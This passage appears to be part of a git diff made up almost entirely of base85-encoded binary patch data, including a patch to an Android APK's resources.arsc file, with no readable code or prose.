zgLPmFxD;qW2UmbEf+OJT;5KkKcmNy&KLRg+m%wY_1fV+1K~M#n!9`#l7y@G;4W_|o z!ByZ8_!9UExB+|Deyl)tw)`p0@Q&EKs)FJePBD- z12m8ZSAxUf2Jmh00C*HU16~BLfaBl<_z;`|Y6Ipds059m18f7AffTp~TnD}ez5(t8 z$G|h-dGIRu7w|TC51a!34gMFX^HDY^1=XMyG=f&J92B5ieV`cNRw3LDgsDrIo`k7H zm>v`YR`(N{ODL9*mCgeT0G1NM5y60j631Ixh*uoAR^ zcF+M|KE0Iyjaz(&vmHi6Bc7xaNGU@Pbc+rR)A1ebw07za8?0$u|r zKpJF#0o;I(a;$UQKSHL6iY%S&eoGHQ$3NLYBa}IiST*ev{gJXD%IG*i1PJD1b@>ub)2e8id?zQxt(4&^VH&1uv>0^0%3c6;+ zPvzOK&eN~U(~soo+_qsW?=8@C<=l}M^I)ESEKh$D`aUb~vw8Lx^Yr7;V^+*t&_^u& zUFbZQc)s#+IbfaJv)|HBLFazsxywfZBCwTWetGF_NRK7G7_CyISz=40LP)12+0N;l z{bHFGbctoZR7x9tQOYIskC1*6bPr@P()0NRO5Fpk>#~bcrQxbOdRymCuW~Ntv#u15(=QsFV)6RZ6p7 zj(E9ey|%jr$XLfCDV#e0g1kxHF%#;-0r8msf~Y=q*T})gB*a z{8ci20ew!&Mf6Q6&!ZDkw$g`?MOM7ulEsz`ShB>DrIwtB6_MLF4?Xq}WF_uyPFG@8 z{E3u;{sFQIcRJgvahIF2g}yA)E%cX`yg^DI-2z#I6@%kyP|qPt-X!Hh`W<8)>bqG= zH+@UWQo3DA4}A}^0r`FmIUoJ@G~@!Sy^UxWm&8cCd{xaqzqWnj9-Wu_zT$2$ByzkWHV;O{g5rl{{>4PmeNVLN!dg{m$IJz z88VEPbNON11-D7*qHjaCTK(3F)$RvKFSgpVWJW6V1nkRjrLRiaNUuRIr@8c3QkKyj zQa00lkOiO^EC77COhI<;7#z8Mfc?C7MIigJ&=y;MzL)vnw(`OLz3|srelOAjsDKal z^RW{C*HCC7boS@!-wr*6{FlQ27L2*Qhy8xkKLmLg{+q1wc|Xc;{|=<@hW}B^&wJEt z|1tQVg8#QDlzp@P&%*x#{3qe(wQIKjIQ+kW{}1r<-ZI<&F8pu9|1tcfXYv0Y{@=mR zhXO7`oCdg$bW6`da=%;)$uZYM9?jEl&(rVA(;vyxpM=h3{6tD2^|tvW*OQcg6+Awa ztw{SC*d4I!7J_m<)$*;kd=bB(2|thM>3mye@+rv2E%o6#xKxZad``$3rHk}X0agUB z?5kY4dn|th`6m2469UrDE#-EP!q018iU$$p=In_XJNN!+duGPYBjQ6|A+O*H*ehTO zirx5L+X`!C;;CavP0uO^irL0qYOLR zpodiCPWek<=W8;@?i(n>CF@!O-^I}4$aVUfZ-w9NBXc~>YsTjj*tvHCB7m#u#5KE> zrD&fXS|jxbYq7hD#*;t8##n^GDnTiB#D5R@p5ppE)fB` z=z6FJ>#old$r?*goVby%fS zq1EW;v-s@QvW*&ii*W^R&q|LSdMorgXAOKyXa~w!jul4tFT;G){Y!DK6Z5Fj!y~9d(yN2RY*YI^HMbj<7ZaIQ7T)mOwh`usRI_Z8#Z5%AT&pNs9IzxMLF zXP5I$P!&FC;GcrZE(&z(p>E73p26#Q1}PK%4oEjm$j>cqWu+3JIaVO4232vptxsxtT|L4bbPIKNlDd-Y%#+bR*ay>4d zi)MNgmqK;+R*Zcv2YWYg9gy%kgRbmM2_-H+RvuaB>{6Vm&=6%Q=)4orUHDAocCK)) z!S(OJxOg2kj%Dy&i`*-$QcqC*bE~P+y@>kU1s)#pLj_)E{j+PR&*4J4k6uL`+vrEg zhj|woz;mJQ--1=QPOXI256z2O&&Ox5VW)@ck9E?-nlgI%knZ0KpD(ZO7HY(%&g%l- 
z@Aso`S3?gvMk%m?`*ad5wm1qyv%8Pg}JxO(ZDL#cjhbAh>N9 zImk{(w^%8hn7{K77bq?g6LQsT{9_?juf{*Xh@-+RH;B^lNAzDPH-Fu8!piB7V7~w| z6kA3s)FyK7t--TUo$z7ZszOXq-HGeI6xZ!l0&1YNe(gF6*!zUdUT0s7n4K71ea#+P z9MS!k@%@DvehHqs^w4g(wyVg=M~$_&^8C)(7UbE?T@}x7uyMNrcy8;)?q;*{FM%Dm z2L-Sn<*up2ip}l6IeXVR>>JKu?>&co+d1q*v+VqiGyiyYRyyb7_VZB&jw6QmI+nSE z$BBdjtr2gIL<@;9t!iDg_`)Simn~nhva_pu?Yi|F zHuh}V+}pQhYyY-^!N~TZ9Xl`H6&;R^X!}OT;+OAFjO)qNL^@++Cl5?bUqPasT}WmOv~on7Sb%El8T-AR34e6;2A=wy^cH!0mcWM8|kYx@RruFobC+Xs3` z-LNh~qKA|ork4b^fnHL2yUE_WaqD0NDjdDNr1s)u@9p0@5TUufQGFzxjE{t)sZ_W# zX2d7s#&jE1%-CZ|-OzL+j20N$l+i|WW?ackxHB`Y$0E_p{=Aa%&23bYAKsPKM-o~a z)z26w5m7S8LW zHkyC-n7(LS&s|}|qW@pmVs7hMYs@dLjjGQc)E}KrB%>p3wD1%Ck#sg=^hI@C39h^9 z?6Ct4QNw_{_FV3fbo4-Un7eo0xkBP-O3k^PiRg4Pivd1oK*mVN_0cveKSv2XIwR4< zWPE=(s_RK3YQ&Rzc%2?gBs0j^orq>K+@GHi)2A6@Ni?$hEI~awriE2V?OFVN+W4>) zprM|svxE%BNA;+YO{0&3XK_cy(#ZqJI#YXQ8k2E6yjGi%_4Z;cd4wu@`9=)Kli{^d zBif^3Oaz8P;!OB>;xOIufVLy7N;$D#(NgmuwbBc2H7a+1Xi`YMG4elG(K*pV>9*qcJ0y#$I7w z_vw<)T+L?Z=Sw~_qBwskHMcmgwQ!oLax0ae&Ga}1OsS$(;% zX9jTE)4g$B_vXRveS3Pg^h7qX1Dod%DMQ#Uhc*FhnM2q+aq1--PS`#9jLmgu7d7m} zv1sw~mR9^NI!CS4a50W0IL;9u%_Me_vJ18CLfH+waC}lU`$*Z{MSx{k# zy2rGyPeeyEm&T+)ivESLiT-$Y-WtqeaRF#_a)O?xX+75HKTJllT4r-nJ2&o3>&ZZ zJ()}veN8^tTi>$0pVe@7!fd}pjP&wm3S3l=ukHk-}p%IpX?caz8HKe5fHcfxdO%G>Sg7C%7moNMJjc zEjQIcev*VUl}uw;64`WuY~y%lB{=TRsmUx}ZKR@U^tQpB>5w|+J!D4XQfw(6c2CNDl5D{| zIGwmWnx>)@c2YckU>ZcyQS_>sGBAD9a@#R)aw_1Rl0PR*lap00*JIr(8zYf^a$AW= zcR#6VOeK+_KqfkgQMLvP6<{tYnPCv4!i>fZ#rofk8;qP8bGIO026Msuz`!$$+(@s* zB*jAzl|Y}pb)gc?nDyXK9@zTR=&7_ZO@1T>w27>S2W0tdD9f3>36VXM(6khUIff7z zL$?(2BMQo4(}1}=@CaDm%#Jv^*O8IWBUF&d4qK|t7>i>(_}tJ+sxh7-myxtO)Q0eJ zQZWBio+eJ5WSNd^Mq8i6!UUOa8Nm%8Cdob-O=K|@vChQzO_Tiqo(|BJQz(_3KD?XZ zbCvi&IDNZlzD&&*Cy^40U7<$tv~>75$|vnP(F)T`&0B)iDjgB?@$%5=dz{L|PZ8g~ z`<-@tYlkeQeCiZ0!dR_}cZ4E@O7{pQzO#eIZTE?%#Fxb1!}+jU@I%ogDvDIcQI^H3 z?XYOttg2rYO0%k5Cswy#qS9Z$)ZDR4wSQgI#37wGi%@&}s_&}ekf_{jb3G>N+cvB2 zH$-FmA+flW>cwZAz7JJ;9QC^FqzWi4({|yYN;^43GiySyTEi+`Bp&3eRmDqUq1Di4 
zF{iKtzqD{}s#TS%g>si_dxRS%E@|4lMU?qfDr^$x`BnRG#G*rS)p0_EMMY`*uJ*61 z>V2YWs$DryWmoME;cz(UM(*B+RplYk^suUaS2W$I+K!3V8&!eO8&&&LqV77oK)B6r zudw>H1zALK(dru6%@ua)t42$gaKCO9?{RaRRk~X&N2{L`MR8SmS*-ZoREM2VkV31J zgW|IY?Y1OdSo&y#a;JC&Iq^Chr$RpY`BcKExqNctq^~4mn{s6?8olIy_HYEgqbwpo7$)2zrp~#d+e|(7Sv(SZPy^Rw~N7m40!! z%7w2;?d76E{;@0&uF`7{+J06gkn2>Ha9vj|+|N{tg5$Nq^(4N}xussXe?MQikKnbM zVyi;bi3PTTs~fAuiAEs~HVJX0NfGxo@e7`Mc%N+Iwii}3KtC>ZU&VarA4y&dn^84lYirg zB<%(KJ4b%U#qYKFw~i{lbK~!Z`CXt0neXr#@V?Cfoxc<2?|=nj_}wmlFRZ}M_402c kRp_du&_hb->TPm!u?;qA1CF(XvhJ6~8IJYNt}{_?f7ZW7k%l)Xt+6c`ehTE?M&G zl@_&{Ic=I`d9-QLHU-ud*pfdotVL5aa9afEg1rX>U5B_`mb4v;CBudVP1XenHtcsU zFJ)ShhJDiSp7WjayJa**z@?FZ^4V$g^l_-wm&uA{&v zcR(4w4Bv;J!n?4BHtm4ZFbB`TRroplC$!PyK^TL(VICfb=in;53U7n7k`^|@EpQiH zf-k_=;ZNYl@G4w`e}p&TpW!X|4`^E>G6VhQEPp@N4*2cn73S z#DXxiK@V((U9cYx!N=h|+zXR11NXxt@GLwJFTtO|&)_xqC-@co2L2s>2mb@Xc7_)^ zU>yuV3iiTb7=>}T7aS8z8Xc2r`lo8rd<$LswF5NNGut6#SfcV3 zWW<+IdK)FKlH)^SV#pM-3Hb?R9O)vPk*AS5Cl7-uYd~eYdFQX)j}ou<;|)tPCReaGu&N(JhFRfSZkW}6KQiLSBh1XbUcAMZmZXVC{c@tDJL$!{ zk7gII_{tAM<6CFXO&!_GODNyVz~ozAjo^LMGUW8c(ni zAM_+=C~_?$rS@({G>cqE{&Sw(AYVr&Ie;&EG9vTH9{dj=d&#wk?DOmEr(7+kpBZ`5 zlSz5XlQDT3IpC)oV5ZJ^@n&Df&a=GF3j&Ax9uZpf$Ox*D(N>srcZl21oE#!PCd+)wf8 zJ$Qq;i{3MkMPfI@`BoN2#$NShDL=PKA$gHlL_#i!wnu*Zy4_mFCz-HRCm9~aM#leqAU#Q1OFvt77 zHCIe-jCW$czE{7nG*&n6;YU`nKe3AatEN_iidR`J;N1sR^CS;(g2F+8*5xDy#JS`XEy0tKXlu zKAv`~?N_;L$)EDq&s&@?YFiH~^%+!s{odb3&$e9xJ1(V5Vhl@Y zIOpWt17aQ+lKA17Tt0iG;9ST};-5{6aYTYgj~)KRZDNdwIiie-F(&31jsC&5x-adzbavxv?rbSNm!8l;Tf174Ty{t{tme$87YZ{>+o}o5 zZYk$X4oT-KCFq!E)A`xlR4VN_1vl;H3Qp>nlgSs#WIU2jm&-Z^|3{h=wtKNaBiFBx zXvAT%{X#ab;6GtcPxuLJ>RGo!k~6tUC+*IZ7^B1r?(vJI!W>zbYA-La#HLe6?Rl?W zT^G9Ey2f-nrE-PT(X^W$af&nU8MkDor?uEx*U1^T#ur=i9na}BT~Dj=8`HKerM;o} z_9gR;$(t+oeA<~z`9rj3xoLO{heF44Yqd{)gOI)%q-EjJxqRw0M^k~pk1cK7%6ZpZyRj;!&}siDJS*l|j=HlPb!R#1f@eAF#-#5q!p>d$ zb`0{jGr4k*zE2YN5LWhAtYVxK^Za2rA}!}@y6ewRYptz1iZ>Xm!`NJ#(jTn!L?&xr zn7o*~G?kxr3dK*C%I?hU-2B4*5>96_cDdX)I5@bZ??jJO?8o!z$+FaQir?p?r)>$L 
z*-lmhdb~(%V#aj~&V40&)-IK8F)|X&TuhhB(vZ>pt1DF^o?2NsxY^#e)OpAMyeolB zq2xtN_L%KREL#|H4yQ9ylcfS@y3|*XDKSW8&)b<9m&fx9IVY=!`{9L=tXLNcWoeqU z-9r=QLLUFAw0luv7`(CbD~=G?=9G`-Xg86XogxjyE33yVsCKuAk&{4<=8Boif+L}v zGh3LVIow6P4u&dcp#<|63uRXt@@#ysYAnSQOi?=yt5Y&|lyDVijgw2^Z5PCdOs_CFJQ$7qVxr=+Evp0%-7 z+Ddse$}CSvW7*c4-9qUIlP|F{LtnYQ>m-rQc9-3SB}f^QwkH^%FtL*B-Sj0?_Ra%o zD9=pzYQVjiqj!4kV`aJpt>#dvlwOc}w@_L55+K{O7_$x{1%b+L2O@5TC!XNehR(3DNaqUVTds+ec5ia|^-T4rhBMayyrp0)zBTb{NIXYJEg z@N>x*4+f2(8MK0dU@)dZoh@F%uDOo!s&Zdd$yb$P zRe8c}*J6U5&7JYirp{PrqjAveIM#98$nwB@S+7CwYI)bdWqnbTuDZ`J243K;&@}4N zUTHDR*IUBIFI#!HF^ngYk;TQpVtds1W;+Jcd?MM1;idN2E6Ja=8&{0?+D!=>R>DX$ zll!R-V8GGFg7%`07P#tYuZhc5i@bZMQzt_1o+Oqd~|uC?gj^7Oi{ZuFNt zy}oN5`m4Mr8L}Sjt%Ub($)h!fN>KSM6hWWo^;@<6mZRTJHiG`1qtD{{PNKi*=ySY& ztJdFj^xZ(eJLzvb79V)@^+DfTjHLHdglxkQLRb4D-*ODn=)0|czcR6Fz4}{_g|6S_ hy>BY$`fi}#a)RhuhkhRubgfIjm+8kOZMXgg^}ijLlF$GE 
diff --git a/data/android/apk/resources.arsc b/data/android/apk/resources.arsc index 4fe928b45ed5fab291d93e0fdecab81f29535e1f..9175daa84ec0e56982572ea3b65c8ccf7083b71b 100644 GIT binary patch delta 168 zcmcb>ae#xBiGhc~VIr$Ks|5oCL(;@(>xm{>6Q?OL_H5j#%cN++-~kk70%ArW1}RYh zVgy()@uTQu1!f*bhRM3jlEM(>%s_d#@`)dnCpQ2UFi!4;D_}ua@PJtjs+SdA%7H}y E01jaqIRF3v delta 219 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 